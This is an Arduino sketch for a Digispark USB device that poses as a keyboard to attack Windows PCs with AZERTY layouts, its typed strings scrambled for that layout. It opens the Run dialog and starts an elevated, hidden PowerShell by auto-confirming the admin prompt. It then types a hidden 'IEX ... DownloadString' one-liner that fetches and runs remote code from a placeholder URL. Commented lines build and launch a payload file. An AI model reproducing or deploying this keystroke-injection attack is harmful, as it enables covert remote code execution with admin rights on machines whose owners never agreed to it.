#include "DigiKeyboard.h"
// This script is designed for use on Windows machines with French/AZERTY as a keyboard layout
// As DigiKeyboard Library does not support AZERTY text yet in print(), you have to use the "az_qw_convert.sh" script to convert AZERTY to QWERTY layout.
// For more scripts checkout: https://git.io/vAGf4
// Developer: NBN | 02/13/2018 @19:00
void setup() {
  // Initialize the digital pin as an output.
  pinMode(1, OUTPUT); //LED on Model A
}
void cmd_1() {
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1500);
  DigiKeyboard.print("c;d");
  DigiKeyboard.delay(1500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void cmd_2() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.println("pozershell 6zindozstyle hidden Stqrt6Process c;d 6Verb runQs");
  DigiKeyboard.delay(1500);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
// Infinite loop
void loop() {

  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  digitalWrite(1, HIGH); // LED on <--> Action start
  //cmd_1(); // Open CMD in Administrator Privileges - METHOD 1
  cmd_2(); // Open CMD in Administrator Privileges - METHOD 2
  DigiKeyboard.delay(1500);
//  DigiKeyboard.println(";ode con.cols=!% lines=!");
//  DigiKeyboard.delay(250);
//  DigiKeyboard.println("cd \"TE:P\"");
//  DigiKeyboard.delay(250);
//  DigiKeyboard.println("copy con t;p<c;d");
//  DigiKeyboard.delay(500);
//  DigiKeyboard.println("stqrt C.>Zindozs>Syste;#@>Ribbons<scr >s");
//  DigiKeyboard.delay(250);
    DigiKeyboard.println("pozershell 6zindozstyle hidden 3IEX 5Nez6Object Net<ZebClient-<DoznloqdString54AUTOVALUE4-3");
//  DigiKeyboard.delay(250);
//  DigiKeyboard.sendKeyStroke(KEY_W, MOD_CONTROL_LEFT); // Save the file and return to cmd shell use delay of 500ms
//  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
//  DigiKeyboard.println("t;p<c;d 11 exit"); // Start the payload file and exit (DANGEROUS/OFFENSIVE STEP! Please comment this line if you want to test inoffensively on your own PC)
  digitalWrite(1, LOW); // LED off <--> Action end
  DigiKeyboard.delay(5000); // 5 seconds delay to unplug the device safely between loops
}

